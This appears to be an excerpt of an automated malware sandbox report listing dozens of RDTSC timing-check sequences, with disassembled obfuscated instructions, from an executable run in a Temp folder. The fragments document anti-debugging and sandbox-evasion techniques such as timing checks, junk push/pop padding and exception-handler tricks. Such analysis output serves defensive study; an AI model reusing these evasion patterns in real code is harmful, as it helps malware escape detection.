Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7252F9 second address: 725301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725301 second address: 72535E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB424542853h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pop edx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jno 00007FB42454285Bh 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FB424542856h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 72535E second address: 725364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725364 second address: 725368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725456 second address: 7254B5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB4246CBDE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e sub dword ptr [ebp+122D307Ah], eax 0x00000014 jmp 00007FB4246CBDEAh 0x00000019 popad 0x0000001a lea ebx, dword ptr [ebp+12459FCAh] 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FB4246CBDE8h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a push ebx 0x0000003b sub esi, 6819887Ah 0x00000041 pop edi 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FB4246CBDECh 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7254B5 second address: 7254BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725599 second address: 7255B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FB4246CBDECh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7255B1 second address: 7255B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7255B5 second address: 7255B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7255B9 second address: 7255C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7255C2 second address: 7255D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jbe 00007FB4246CBDE6h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7255D6 second address: 7255DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7255DB second address: 725609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB4246CBDE6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f ja 00007FB4246CBDF7h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71715C second address: 717162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 717162 second address: 71717A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FB4246CBDE6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71717A second address: 7171B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542854h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007FB424542859h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FB424542846h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7450D6 second address: 7450DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7450DA second address: 7450E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7450E0 second address: 745113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FB4246CBDE6h 0x00000009 jnl 00007FB4246CBDE6h 0x0000000f jmp 00007FB4246CBDF6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007FB4246CBDE6h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 745113 second address: 745127 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jnc 00007FB424542846h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 745127 second address: 74512B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 74512B second address: 745136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 745C43 second address: 745C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FB4246CBDE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 745C52 second address: 745C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 745C58 second address: 745C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7460CB second address: 7460D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7460D1 second address: 7460DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7460DF second address: 7460E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7460E5 second address: 746120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB4246CBDE6h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FB4246CBDF5h 0x00000011 jmp 00007FB4246CBDF3h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 746AF8 second address: 746AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 746DDF second address: 746DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 746DE3 second address: 746E00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542855h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 746E00 second address: 746E04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 746E04 second address: 746E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 746E0E second address: 746E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71208E second address: 712092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 712092 second address: 712096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 712096 second address: 71209C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 750765 second address: 750769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 750769 second address: 750783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Dh 0x00000007 jng 00007FB424542846h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 750783 second address: 750788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 750788 second address: 750794 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB42454284Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 750794 second address: 75079E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752BAC second address: 752BD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jo 00007FB42454285Ah 0x0000000f jmp 00007FB424542854h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752BD9 second address: 752BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752BDD second address: 752BE7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB424542846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752BE7 second address: 752C0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 adc edi, 491E0B25h 0x0000000f call 00007FB4246CBDE9h 0x00000014 jl 00007FB4246CBDF4h 0x0000001a pushad 0x0000001b je 00007FB4246CBDE6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752C0E second address: 752C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jng 00007FB42454284Eh 0x0000000c push edi 0x0000000d jbe 00007FB424542846h 0x00000013 pop edi 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b jmp 00007FB424542850h 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752C3A second address: 752C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752EEA second address: 752EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752EEF second address: 752F05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4246CBDF2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752F05 second address: 752F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752FC5 second address: 752FCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FB4246CBDE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752FCF second address: 752FE1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB424542846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 753061 second address: 753088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB4246CBDE6h 0x0000000a popad 0x0000000b jmp 00007FB4246CBDF6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7538FE second address: 753908 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB42454284Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 754CCF second address: 754CD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 756608 second address: 75660C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7570E4 second address: 7570E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75BC88 second address: 75BC8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75BC8C second address: 75BC95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75C1E0 second address: 75C223 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB424542848h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d sbb ebx, 43AC95B1h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FB424542848h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov bl, 52h 0x00000031 push eax 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 push esi 0x00000036 pop esi 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75D26A second address: 75D271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75F143 second address: 75F148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75F148 second address: 75F152 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB4246CBDECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75C3A0 second address: 75C3D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542857h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jmp 00007FB424542859h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75D3E9 second address: 75D489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB4246CBDE6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d pushad 0x0000000e jl 00007FB4246CBDE8h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jmp 00007FB4246CBDF5h 0x0000001e popad 0x0000001f popad 0x00000020 nop 0x00000021 sub dword ptr [ebp+122D1ADAh], ebx 0x00000027 push dword ptr fs:[00000000h] 0x0000002e add bx, 0D95h 0x00000033 mov ebx, 27520FA1h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov bl, 9Bh 0x00000041 mov eax, dword ptr [ebp+122D0801h] 0x00000047 push 00000000h 0x00000049 push ebx 0x0000004a call 00007FB4246CBDE8h 0x0000004f pop ebx 0x00000050 mov dword ptr [esp+04h], ebx 0x00000054 add dword ptr [esp+04h], 0000001Ch 0x0000005c inc ebx 0x0000005d push ebx 0x0000005e ret 0x0000005f pop ebx 0x00000060 ret 0x00000061 mov dword ptr [ebp+122D308Ah], ebx 0x00000067 push FFFFFFFFh 0x00000069 mov bx, di 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 jng 00007FB4246CBDE6h 0x00000076 jmp 00007FB4246CBDEFh 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75D489 second address: 75D48E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 760184 second address: 7601CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 push 00000000h 0x00000007 push ebx 0x00000008 call 00007FB4246CBDE8h 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], ebx 0x00000012 add dword ptr [esp+04h], 00000018h 0x0000001a inc ebx 0x0000001b push ebx 0x0000001c ret 0x0000001d pop ebx 0x0000001e ret 0x0000001f push 00000000h 0x00000021 mov bx, 916Eh 0x00000025 mov ebx, edi 0x00000027 push 00000000h 0x00000029 jmp 00007FB4246CBDF4h 0x0000002e xchg eax, esi 0x0000002f push edi 0x00000030 push eax 0x00000031 push edx 0x00000032 push ecx 0x00000033 pop ecx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75C4B9 second address: 75C4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7601CD second address: 7601EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75C4BD second address: 75C4C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75C4C1 second address: 75C4C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 761245 second address: 76124B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 760327 second address: 76032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75C4C7 second address: 75C4ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542857h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FB424542848h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76124B second address: 76124F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76032B second address: 7603D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FB424542848h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 and bh, FFFFFFB6h 0x00000027 push dword ptr fs:[00000000h] 0x0000002e sbb bx, 86BBh 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007FB424542848h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 0000001Ch 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov ebx, dword ptr [ebp+122D2AA9h] 0x0000005a mov eax, dword ptr [ebp+122D0841h] 0x00000060 call 00007FB42454284Ah 0x00000065 jmp 00007FB424542856h 0x0000006a pop ebx 0x0000006b push FFFFFFFFh 0x0000006d mov dword ptr [ebp+122D1B07h], ebx 0x00000073 nop 0x00000074 pushad 0x00000075 jbe 00007FB42454284Ch 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76124F second address: 761253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
